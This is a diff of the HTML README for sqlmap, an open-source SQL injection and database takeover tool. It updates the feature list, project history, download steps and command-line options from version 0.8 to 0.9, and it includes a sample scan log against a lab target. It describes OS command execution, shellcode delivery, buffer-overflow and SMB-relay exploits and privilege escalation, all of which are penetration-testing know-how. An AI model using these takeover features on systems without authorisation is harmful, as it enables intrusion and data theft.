+<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx">MS08-068</A>) with a UNC path request from the database server to
+the attacker's machine where the Metasploit <CODE>smb_relay</CODE> server
+exploit listens. Supported when running sqlmap with high privileges
+(<CODE>uid=0</CODE>) on Linux/Unix and the target DBMS runs as Administrator
+on Windows.</LI>
+<LI>Database in-memory execution of the Metasploit's shellcode by
+exploiting <B>Microsoft SQL Server 2000 and 2005
+<CODE>sp_replwritetovarbin</CODE> stored procedure heap-based buffer
+overflow</B> (
+<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx">MS09-004</A>). sqlmap has its own exploit to trigger the
+vulnerability with automatic DEP memory protection bypass, but it relies
+on Metasploit to generate the shellcode to get executed upon successful
+exploitation.</LI>
+</UL>
+
+</LI>
+<LI>Support for <B>database process' user privilege escalation</B> via
+Metasploit's <CODE>getsystem</CODE> command which include, among others,
+the 
+<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
+<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>).
+</LI>
+<LI>Support to access (read/add/delete) Windows registry hives.</LI>
+</UL>
+</P>
+
+
+<H2><A NAME="s3">3.</A> <A HREF="#toc3">History</A></H2>
+
+<H2><A NAME="ss3.1">3.1</A> <A HREF="#toc3.1">2011</A>
+</H2>
+
+<P>
+<UL>
+<LI><B>March 10</B>, 
+<A HREF="http://sqlmap.sourceforge.net/#developers">Bernardo and Miroslav</A> release sqlmap
+<B>0.9</B> featuring a totally rewritten and powerful SQL injection
+detection engine, the possibility to connect directly to a database
+server, support for time-based blind SQL injection and error-based SQL
+injection, support for four new database management systems and much more.</LI>
+</UL>
+</P>
+
+<H2><A NAME="ss3.2">3.2</A> <A HREF="#toc3.2">2010</A>
+</H2>
+
+<P>
+<UL>
+<LI><B>December</B>, 
+<A HREF="http://sqlmap.sourceforge.net/#developers">Bernardo and Miroslav</A> have enhanced sqlmap a
+lot during the whole year and prepare to release sqlmap <B>0.9</B>
+within the first quarter of 2011.</LI>
+<LI><B>June 3</B>, Bernardo 
+<A HREF="http://www.slideshare.net/inquis/ath-con-2010bernardodamelegotdbownnet">presents</A>
+a talk titled <EM>Got database access? Own the network!</EM> at AthCon
+2010 in Athens (Greece).</LI>
 <LI><B>March 14</B>, 
-<A HREF="http://sqlmap.sourceforge.net/#author">Bernardo and Miroslav</A> release stable version of 
+<A HREF="http://sqlmap.sourceforge.net/#developers">Bernardo and Miroslav</A> release stable version of 
 sqlmap <B>0.8</B> featuring many features. Amongst these, support to
 enumerate and dump all databases' tables containing user provided
 column(s), stabilization and enhancements to the takeover functionalities,
 updated integration with Metasploit 3.3.3 and a lot of minor features and
 bug fixes.</LI>
 <LI><B>March</B>, sqlmap demo videos have been 
-<A HREF="http://sqlmap.sourceforge.net/demo.html">published</A>.</LI>
+<A HREF="http://www.youtube.com/inquisb#g/u">published</A>.</LI>
 <LI><B>January</B>, Bernardo is 
 <A HREF="http://www.athcon.org/speakers/">invited</A> to present at 
-<A HREF="http://www.athcon.org">AthCon</A> conference in Greece on June
-2010.</LI>
+<A HREF="http://www.athcon.org/archives/2010-2/">AthCon</A> conference in
+Greece on June 2010.</LI>
 </UL>
 </P>
 
-<H3>2009</H3>
+<H2><A NAME="ss3.3">3.3</A> <A HREF="#toc3.3">2009</A>
+</H2>
 
 <P>
 <UL>
@@ -297,7 +622,7 @@ Poland.
 </LI>
 <LI><B>September 26</B>, sqlmap version <B>0.8 release candidate
 1</B> goes public on the 
-<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">Subversion repository</A>, with all the attack
+<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">subversion repository</A>, with all the attack
 vectors unveiled at SOURCE Barcelona 2009 Conference. These include an
 enhanced version of the Microsoft SQL Server buffer overflow exploit to
 automatically bypass DEP memory protection, support to establish the
@@ -308,8 +633,10 @@ inject custom user-defined functions.
 </LI>
 <LI><B>September 21</B>, Bernardo and 
 <A HREF="http://www.pornosecurity.org">Guido Landi</A> 
-<A HREF="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule">present</A> their research (
-<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">slides</A>) at SOURCE Conference 2009 in Barcelona, Spain.
+<A HREF="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule">present</A>
+their research (
+<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">slides</A>)
+at SOURCE Conference 2009 in Barcelona, Spain.
 </LI>
 <LI><B>August</B>, Bernardo is accepted as a speaker at two others IT
 security conferences, 
@@ -353,7 +680,7 @@ the database.
 <LI><B>April 16</B>, Bernardo 
 <A HREF="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-archives.html#Damele">presents</A> his research (
 <A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides">slides</A>, 
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">whitepaper</A>) at Black Hat Europe 2009 in Amsterdam, The Netherlands.
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">whitepaper</A>) at Black Hat Europe 2009 in Amsterdam, The Netherlands.
 The feedback from the audience is good and there has been some 
 <A HREF="http://bernardodamele.blogspot.com/2009/03/black-hat-europe-2009.html">media coverage</A> too.
 </LI>
@@ -380,7 +707,8 @@ private event in London, UK.</LI>
 </UL>
 </P>
 
-<H3>2008</H3>
+<H2><A NAME="ss3.4">3.4</A> <A HREF="#toc3.4">2008</A>
+</H2>
 
 <P>
 <UL>
@@ -400,7 +728,7 @@ tool and
 <A HREF="http://metasploit.com/framework">Metasploit</A>:
 an auxiliary module to launch sqlmap from within Metasploit Framework.
 The 
-<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">Subversion development repository</A> goes public again.
+<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">subversion development repository</A> goes public again.
 </LI>
 <LI><B>September 1</B>, nearly one year after the previous release,
 sqlmap <B>0.6</B> comes to life featuring a complete code
@@ -411,12 +739,13 @@ new installation packages for Debian, Red Hat, Windows and much more.
 <LI><B>August</B>, two public 
 <A HREF="http://sqlmap.sourceforge.net/#ml">mailing lists</A> are created on SourceForge.
 </LI>
-<LI><B>January</B>, sqlmap Subversion development repository is moved
+<LI><B>January</B>, sqlmap subversion development repository is moved
 away from SourceForge and goes private for a while.</LI>
 </UL>
 </P>
 
-<H3>2007</H3>
+<H2><A NAME="ss3.5">3.5</A> <A HREF="#toc3.5">2007</A>
+</H2>
 
 <P>
 <UL>
@@ -448,7 +777,8 @@ parameters.</LI>
 </UL>
 </P>
 
-<H3>2006</H3>
+<H2><A NAME="ss3.6">3.6</A> <A HREF="#toc3.6">2006</A>
+</H2>
 
 <P>
 <UL>
@@ -466,256 +796,29 @@ version <B>0.1</B>.
 <LI><B>July 25</B>, 
 <A HREF="http://dbellucci.blogspot.com">Daniele Bellucci</A>
 registers the sqlmap project on SourceForge and develops it on the
-<A HREF="http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/">SourceForge Subversion repository</A>. The skeleton is implemented and
+<A HREF="http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/">SourceForge subversion repository</A>. The skeleton is implemented and
 limited support for MySQL added.</LI>
 </UL>
 </P>
 
 
-<H2><A NAME="s2">2.</A> <A HREF="#toc2">Features</A></H2>
-
-<P>Features implemented in sqlmap include:</P>
-
-
-<H2><A NAME="ss2.1">2.1</A> <A HREF="#toc2.1">Generic features</A>
-</H2>
-
-<P>
-<UL>
-<LI>Full support for <B>MySQL</B>, <B>Oracle</B>, <B>PostgreSQL</B>
-and <B>Microsoft SQL Server</B> back-end database management systems.
-Besides these four database management systems software, sqlmap can also
-identify Microsoft Access, DB2, Informix, Sybase and Interbase.
-</LI>
-<LI>Full support for three SQL injection techniques: <B> inferential
-blind SQL injection</B>, <B>UNION query (inband) SQL injection</B> and
-<B>batched queries support</B>. sqlmap can also test for <B>time based
-blind SQL injection</B>.
-</LI>
-<LI>It is possible to provide a single target URL, get the list of
-targets from 
-<A HREF="http://portswigger.net/suite/">Burp proxy</A>
-requests log file or
-<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A> <CODE>conversations/</CODE> folder, get the whole HTTP
-request from a text file or get the list of targets by providing sqlmap
-with a Google dork which queries 
-<A HREF="http://www.google.com">Google</A> search engine and parses its results page. You can also
-define a regular-expression based scope that is used to identify which of
-the parsed addresses to test.
-</LI>
-<LI>Automatically tests all provided <B>GET</B> parameters,
-<B>POST</B> parameters, HTTP <B>Cookie</B> header values and HTTP
-<B>User-Agent</B> header value to find the dynamic ones, which means
-those that vary the HTTP response page content.
-On the dynamic ones sqlmap automatically tests and detects the ones
-affected by SQL injection. Each dynamic parameter is tested for
-<EM>numeric</EM>, <EM>single quoted string</EM>, <EM>double quoted
-string</EM> and all of these three data-types with zero to two parenthesis
-to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
-perform further injections with. It is also possible to specify the only
-parameter(s) that you want to perform tests and use for injection on.
-</LI>
-<LI>Option to specify the <B>maximum number of concurrent HTTP
-requests</B> to speed up the inferential blind SQL injection algorithms
-(multi-threading). It is also possible to specify the number of seconds to
-wait between each HTTP request.
-</LI>
-<LI><B>HTTP <CODE>Cookie</CODE> header</B> string support, useful when the
-web application requires authentication based upon cookies and you have
-such data or in case you just want to test for and exploit SQL injection
-on such header. You can also specify to always URL-encode the Cookie
-header.
-</LI>
-<LI>Automatically handle <B>HTTP <CODE>Set-Cookie</CODE> header</B> from
-the application, re-establishing of the session if it expires. Test and
-exploit on these values is supported too. You can also force to ignore any
-<CODE>Set-Cookie</CODE> header.
-</LI>
-<LI><B>HTTP Basic, Digest, NTLM and Certificate authentications</B>
-support.
-</LI>
-<LI><B>Anonymous HTTP proxy</B> support to pass by the requests to the
-target application that works also with HTTPS requests.
-</LI>
-<LI>Options to fake the <B>HTTP <CODE>Referer</CODE> header</B> value and
-the <B>HTTP <CODE>User-Agent</CODE> header</B> value specified by user or
-randomly selected from a text file.
-</LI>
-<LI>Support to increase the <B>verbosity level of output messages</B>:
-there exist <B>six levels</B>. The default level is <B>1</B> in which
-information, warnings, errors and tracebacks (if any occur) will be shown.
-</LI>
-<LI>Granularity in the user's options.
-</LI>
-<LI><B>Estimated time of arrival</B> support for each query, updated
-in real time while fetching the information to give to the user an
-overview on how long it will take to retrieve the output.
-</LI>
-<LI>Automatic support to save the session (queries and their output,
-even if partially retrieved) in real time while fetching the data on a
-text file and <B>resume the injection from this file in a second
-time</B>.
-</LI>
-<LI>Support to read options from a configuration INI file rather than
-specify each time all of the options on the command line. Support also to
-save command line options on a configuration INI file.
-</LI>
-<LI>Option to update sqlmap as a whole to the latest development version
-from the Subversion repository.
-</LI>
-<LI>Integration with other IT security open source projects,
-<A HREF="http://metasploit.com/framework/">Metasploit</A> and 
-<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
-</UL>
-</P>
-
-
-<H2><A NAME="ss2.2">2.2</A> <A HREF="#toc2.2">Fingerprint and enumeration features</A>
-</H2>
-
-<P>
-<UL>
-<LI><B>Extensive back-end database software version and underlying
-operating system fingerprint</B> based upon
-<A HREF="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html">inband error messages</A>,
-<A HREF="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html">banner parsing</A>,
-<A HREF="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html">functions output comparison</A> and
-<A HREF="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html">specific features</A>
-such as MySQL comment injection. It is also possible to force the back-end
-database management system name if you already know it.
-</LI>
-<LI>Basic web server software and web application technology fingerprint.
-</LI>
-<LI>Support to retrieve the DBMS <B>banner</B>, <B>session user</B>
-and <B>current database</B> information. The tool can also check if the
-session user is a database administrator (DBA).
-</LI>
-<LI>Support to enumerate <B>database users</B>, <B>users' password
-hashes</B>, <B>users' privileges</B>, <B>databases</B>,
-<B>tables</B> and <B>columns</B>.
-</LI>
-<LI>Support to <B>dump database tables</B> as a whole or a range of
-entries as per user's choice. The user can also choose to dump only
-specific column(s).
-</LI>
-<LI>Support to automatically dump <B>all</B> databases' schemas and
-entries. It is possibly to exclude from the dump the system databases.
-</LI>
-<LI>Support to enumerate and dump <B>all databases' tables containing user
-provided column(s)</B>. Useful to identify for instance tables containing
-custom application credentials.
-</LI>
-<LI>Support to <B>run custom SQL statement(s)</B> as in an interactive
-SQL client connecting to the back-end database. sqlmap automatically
-dissects the provided statement, determines which technique to use to
-inject it and how to pack the SQL payload accordingly.</LI>
-</UL>
-</P>
-
-
-<H2><A NAME="ss2.3">2.3</A> <A HREF="#toc2.3">Takeover features</A>
-</H2>
-
-<P>Some of these techniques are detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> and in the
-slide deck 
-<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">Expanding the control over the operating system from the database</A>.</P>
-<P>
-<UL>
-<LI>Support to <B>inject custom user-defined functions</B>: the user
-can compile shared object then use sqlmap to create within the back-end
-DBMS user-defined functions out of the compiled shared object file. These
-UDFs can then be executed, and optionally removed, via sqlmap too.
-</LI>
-<LI>Support to <B>read and upload any file</B> from the database
-server underlying file system when the database software is MySQL,
-PostgreSQL or Microsoft SQL Server.
-</LI>
-<LI>Support to <B>execute arbitrary commands and retrieve their
-standard output</B> on the database server underlying operating system
-when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-<UL>
-<LI>On MySQL and PostgreSQL via user-defined function injection and
-execution.</LI>
-<LI>On Microsoft SQL Server via <CODE>xp_cmdshell()</CODE> stored procedure.
-Also, the stored procedure is re-enabled if disabled or created from
-scratch if removed.</LI>
-</UL>
-
-</LI>
-<LI>Support to <B>establish an out-of-band stateful TCP connection
-between the user machine and the database server</B> underlying operating
-system. This channel can be an interactive command prompt, a Meterpreter
-session or a graphical user interface (VNC) session as per user's choice.
-sqlmap relies on Metasploit to create the shellcode and implements four
-different techniques to execute it on the database server. These
-techniques are:
-<UL>
-<LI>Database <B>in-memory execution of the Metasploit's shellcode</B>
-via sqlmap own user-defined function <CODE>sys_bineval()</CODE>. Supported on
-MySQL and PostgreSQL.</LI>
-<LI>Upload and execution of a Metasploit's <B>stand-alone payload
-stager</B> via sqlmap own user-defined function <CODE>sys_exec()</CODE> on
-MySQL and PostgreSQL or via <CODE>xp_cmdshell()</CODE> on Microsoft SQL
-Server.</LI>
-<LI>Execution of Metasploit's shellcode by performing a <B>SMB
-reflection attack</B> (
-<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx">MS08-068</A>) with a UNC path request from the database server to
-the user's machine where the Metasploit <CODE>smb_relay</CODE> server exploit
-runs.</LI>
-<LI>Database in-memory execution of the Metasploit's shellcode by
-exploiting <B>Microsoft SQL Server 2000 and 2005
-<CODE>sp_replwritetovarbin</CODE> stored procedure heap-based buffer
-overflow</B> (
-<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx">MS09-004</A>) with automatic DEP bypass.</LI>
-</UL>
-
-</LI>
-<LI>Support for <B>database process' user privilege escalation</B> via
-Metasploit's <CODE>getsystem</CODE> command which include, among others,
-the 
-<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
-<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>) or via 
-<A HREF="http://labs.mwrinfosecurity.com/files/Publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf">Windows Access Tokens insecure design</A> by using Meterpreter's
-<CODE>incognito</CODE> extension.
-</LI>
-<LI>Support to access (read/add/delete) Windows registry hives.</LI>
-</UL>
-</P>
-
-
-<H2><A NAME="s3">3.</A> <A HREF="#toc3">Download and update</A></H2>
+<H2><A NAME="s4">4.</A> <A HREF="#toc4">Download and update</A></H2>
 
 <P>sqlmap can be downloaded from its
 <A HREF="http://sourceforge.net/projects/sqlmap/files/">SourceForge File List page</A>.
-It is available in various formats:</P>
+It is available in two formats:</P>
 <P>
 <UL>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.8.tar.gz">Source gzip compressed</A> operating system independent.
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz">Source gzip compressed</A>.
 </LI>
 <LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.8.tar.bz2">Source bzip2 compressed</A> operating system independent.
-</LI>
-<LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.8.zip">Source zip compressed</A> operating system independent.
-</LI>
-<LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.8-1_all.deb">DEB binary package</A> architecture independent for Debian and any
-other Debian derivated GNU/Linux distribution.
-</LI>
-<LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.8-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
-other operating system that can install RPM packages.
-</LI>
-<LI>
-<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.8_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
-interpreter</B> to be installed on the operating system.</LI>
+<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.zip">Source zip compressed</A>.</LI>
 </UL>
 </P>
 
-<P>You can also checkout the latest development version from the sqlmap
-<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">Subversion</A>
+<P>You can also checkout the latest development version from the
+<A HREF="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">subversion</A>
 repository:</P>
 <P>
 <BLOCKQUOTE><CODE>
@@ -725,9 +828,7 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>If you download a source package (gzip, bzip2 or zip) or sqlmap from the
-Subversion repository, you can update it to the latest development version
-anytime by running:</P>
+<P>You can update it at any time to the latest development version by running:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
@@ -744,36 +845,8 @@ $ svn update
 </CODE></BLOCKQUOTE>
 </P>
 
-<P>Viceversa if you download a binary package (deb, rpm or exe), the
-update feature is disabled.</P>
-
-<P>There are some differences between the packages:</P>
-<P>
-<UL>
-<LI>The source packages (gzip, bzip2 and zip) have all features. They
-contains the working copy from the Subversion repository updated at the
-time the sqlmap new version has been released.</LI>
-<LI>The Debian and Red Hat installation packages (deb and rpm) are
-compliant with the Linux distributions' packaging guidelines. This implies
-that they do not support the update features and do not include UPX (used
-to pack the Metasploit payload stager in some cases, see below).</LI>
-<LI>The Windows binary package (exe) can't update itself and does not
-support the takeover out-of-band features because they rely on
-Metasploit's <CODE>msfcli</CODE> which is not available for Windows.</LI>
-</UL>
-</P>
-
-<P>It is therefore recommended to download any of the source packages and run
-it either from a shell like Bash on Unix and Mac OSX or from Cygwin on
-Windows.</P>
-
-
-<H2><A NAME="s4">4.</A> <A HREF="#toc4">License and copyright</A></H2>
-
-<P>sqlmap is released under the terms of the
-<A HREF="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html">General Public License v2</A>.
-sqlmap is copyrighted by
-<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A>.</P>
+<P>This is strongly recommended <B>before</B> reporting any bug to the 
+<A HREF="http://sqlmap.sourceforge.net/#ml">mailing list</A>.</P>
 
 
 <H2><A NAME="s5">5.</A> <A HREF="#toc5">Usage</A></H2>
@@ -783,20 +856,21 @@ sqlmap is copyrighted by
 <PRE>
 $ python sqlmap.py -h
 
-    sqlmap/0.8 - automatic SQL injection and database takeover tool
+    sqlmap/0.9 - automatic SQL injection and database takeover tool
     http://sqlmap.sourceforge.net
-    
+
 Usage: sqlmap.py [options]
 
 Options:
   --version             show program's version number and exit
   -h, --help            show this help message and exit
-  -v VERBOSE            Verbosity level: 0-5 (default 1)
+  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
   Target:
     At least one of these options has to be specified to set the source to
     get target urls from.
 
+    -d DIRECT           Direct connection to the database
     -u URL, --url=URL   Target url
     -l LIST             Parse targets from Burp or WebScarab proxy logs
     -r REQUESTFILE      Load HTTP request from a file
@@ -806,53 +880,65 @@ Options:
   Request:
     These options can be used to specify how to connect to the target url.
 
-    --method=METHOD     HTTP method, GET or POST (default GET)
     --data=DATA         Data string to be sent through POST
     --cookie=COOKIE     HTTP Cookie header
     --cookie-urlencode  URL Encode generated cookie injections
     --drop-set-cookie   Ignore Set-Cookie header from response
     --user-agent=AGENT  HTTP User-Agent header
-    -a USERAGENTSFILE   Load a random HTTP User-Agent header from file
+    --random-agent      Use randomly selected HTTP User-Agent header
     --referer=REFERER   HTTP Referer header
     --headers=HEADERS   Extra HTTP headers newline separated
     --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
     --auth-cred=ACRED   HTTP authentication credentials (name:password)
     --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
     --proxy=PROXY       Use a HTTP proxy to connect to the target url
+    --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
     --ignore-proxy      Ignore system default HTTP proxy
-    --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
     --delay=DELAY       Delay in seconds between each HTTP request
     --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
     --retries=RETRIES   Retries when the connection timeouts (default 3)
     --scope=SCOPE       Regexp to filter targets from provided proxy log
+    --safe-url=SAFURL   Url address to visit frequently during testing
+    --safe-freq=SAFREQ  Test requests between two visits to a given safe url
+
+  Optimization:
+    These options can be used to optimize the performance of sqlmap.
+
+    -o                  Turn on all optimization switches
+    --predict-output    Predict common queries output
+    --keep-alive        Use persistent HTTP(s) connections
+    --null-connection   Retrieve page length without actual HTTP response body
+    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
+    --group-concat      Use GROUP_CONCAT MySQL technique in dumping phase
 
   Injection:
     These options can be used to specify which parameters to test for,
-    provide custom injection payloads and how to parse and compare HTTP
-    responses page content when using the blind SQL injection technique.
+    provide custom injection payloads and optional tampering scripts.
 
     -p TESTPARAMETER    Testable parameter(s)
     --dbms=DBMS         Force back-end DBMS to this value
     --os=OS             Force back-end DBMS operating system to this value
     --prefix=PREFIX     Injection payload prefix string
-    --postfix=POSTFIX   Injection payload postfix string
+    --suffix=SUFFIX     Injection payload suffix string
+    --tamper=TAMPER     Use given script(s) for tampering injection data
+
+  Detection:
+    These options can be used to specify how to parse and compare page
+    content from HTTP responses when using blind SQL injection technique.
+
+    --level=LEVEL       Level of tests to perform (1-5, default 1)
+    --risk=RISK         Risk of tests to perform (0-3, default 1)
     --string=STRING     String to match in page when the query is valid
     --regexp=REGEXP     Regexp to match in page when the query is valid
-    --excl-str=ESTRING  String to be excluded before comparing page contents
-    --excl-reg=EREGEXP  Matches to be excluded before comparing page contents
+    --text-only         Compare pages based only on their textual content
 
   Techniques:
-    These options can be used to test for specific SQL injection technique
-    or to use one of them to exploit the affected parameter(s) rather than
-    using the default blind SQL injection technique.
+    These options can be used to tweak how specific SQL injection
+    techniques are tested.
 
-    --stacked-test      Test for stacked queries (multiple statements) support
-    --time-test         Test for time based blind SQL injection
     --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
-    --union-test        Test for UNION query (inband) SQL injection
-    --union-tech=UTECH  Technique to test for UNION query SQL injection
-    --union-use         Use the UNION query (inband) SQL injection to retrieve
-                        the queries output. No need to go blind
+    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
+    --union-char=UCHAR  Character to use to bruteforce number of columns
 
   Fingerprint:
     -f, --fingerprint   Perform an extensive DBMS version fingerprint
@@ -869,11 +955,13 @@ Options:
     --users             Enumerate DBMS users
     --passwords         Enumerate DBMS users password hashes
     --privileges        Enumerate DBMS users privileges
+    --roles             Enumerate DBMS users roles
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables
     --columns           Enumerate DBMS database table columns
     --dump              Dump DBMS database table entries
     --dump-all          Dump all DBMS databases tables entries
+    --search            Search column(s), table(s) and/or database name(s)
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
@@ -886,6 +974,12 @@ Options:
     --sql-query=QUERY   SQL statement to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
+  Brute force:
+    These options can be used to run brute force checks.
+
+    --common-tables     Check existence of common tables
+    --common-columns    Check existence of common columns
+
   User-defined function injection:
     These options can be used to create custom user-defined functions.
 
@@ -896,9 +990,9 @@ Options:
     These options can be used to access the back-end database management
     system underlying file system.
 
-    --read-file=RFILE   Read a file from the back-end DBMS file system
-    --write-file=WFILE  Write a local file on the back-end DBMS file system
-    --dest-file=DFILE   Back-end DBMS absolute filepath to write to
+    --file-read=RFILE   Read a file from the back-end DBMS file system
+    --file-write=WFILE  Write a local file on the back-end DBMS file system
+    --file-dest=DFILE   Back-end DBMS absolute filepath to write to
 
   Operating system access:
     These options can be used to access the back-end database management
@@ -925,15 +1019,26 @@ Options:
     --reg-data=REGDATA  Windows registry key value data
     --reg-type=REGTYPE  Windows registry key value type
 
-  Miscellaneous:
+  General:
+    These options can be used to set some general working parameters.
+
+    -x XMLFILE          Dump the data into an XML file
     -s SESSIONFILE      Save and resume all data retrieved on a session file
+    -t TRAFFICFILE      Log all HTTP traffic into a textual file
     --flush-session     Flush session file for current target
     --eta               Display for each output the estimated time of arrival
-    --gpage=GOOGLEPAGE  Use google dork results from specified page number
     --update            Update sqlmap
     --save              Save options on a configuration INI file
     --batch             Never ask for user input, use the default behaviour
+
+  Miscellaneous:
+    --beep              Alert when sql injection found
+    --check-payload     IDS detection testing of injection payload
     --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
+    --forms             Parse and test forms on target url
+    --gpage=GOOGLEPAGE  Use google dork results from specified page number
+    --parse-errors      Parse DBMS error messages from response pages
+    --replicate         Replicate dumped data into a sqlite3 database
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
@@ -942,313 +1047,63 @@ Options:
 <H2><A NAME="ss5.1">5.1</A> <A HREF="#toc5.1">Output verbosity</A>
 </H2>
 
-<P>Option: <CODE>-v</CODE></P>
+<P>Switch: <CODE>-v</CODE></P>
 
-<P>Verbose options can be used to set the verbosity level of output messages.
-There exist six levels.
-The default level is <B>1</B> in which
-information, warnings, errors and tracebacks (if any occur) will be shown.
-Level <B>2</B> shows also debug messages, level <B>3</B> shows also
-full HTTP requests, level <B>4</B> shows also HTTP responses headers and
-level <B>5</B> shows also HTTP responses page content.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target (verbosity level <B>1</B>):</P>
+<P>This switch can be used to set the verbosity level of output messages.
+There exist <B>seven</B> levels of verbosity.
+The default level is <B>1</B> in which information, warning, error and critical messages and Python tracebacks (if any occur) will be displayed.</P>
 <P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
-
-[hh:mm:58] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
-[hh:mm:58] [INFO] testing connection to the target url
-[hh:mm:58] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:59] [INFO] url is stable
-[hh:mm:59] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:59] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
-[hh:mm:59] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:59] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:59] [INFO] GET parameter 'id' is dynamic
-[hh:mm:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:59] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:59] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:59] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:59] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:59] [INFO] testing MySQL
-[hh:mm:59] [INFO] confirming MySQL
-[hh:mm:59] [INFO] retrieved: 0
-[hh:mm:59] [INFO] the back-end DBMS is MySQL
-
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
+<UL>
+<LI><CODE>0</CODE>: Show only Python tracebacks, error and critical messages.</LI>
+<LI><CODE>1</CODE>: Show also information and warning messages.</LI>
+<LI><CODE>2</CODE>: Show also debug messages.</LI>
+<LI><CODE>3</CODE>: Show also payloads injected.</LI>
+<LI><CODE>4</CODE>: Show also HTTP requests.</LI>
+<LI><CODE>5</CODE>: Show also HTTP responses' headers.</LI>
+<LI><CODE>6</CODE>: Show also HTTP responses' page content.</LI>
+</UL>
 </P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target (verbosity level <B>2</B>):</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2
-
-[hh:mm:22] [DEBUG] initializing the configuration
-[hh:mm:22] [DEBUG] initializing the knowledge base
-[hh:mm:22] [DEBUG] cleaning up configuration parameters
-[hh:mm:22] [DEBUG] setting the HTTP timeout
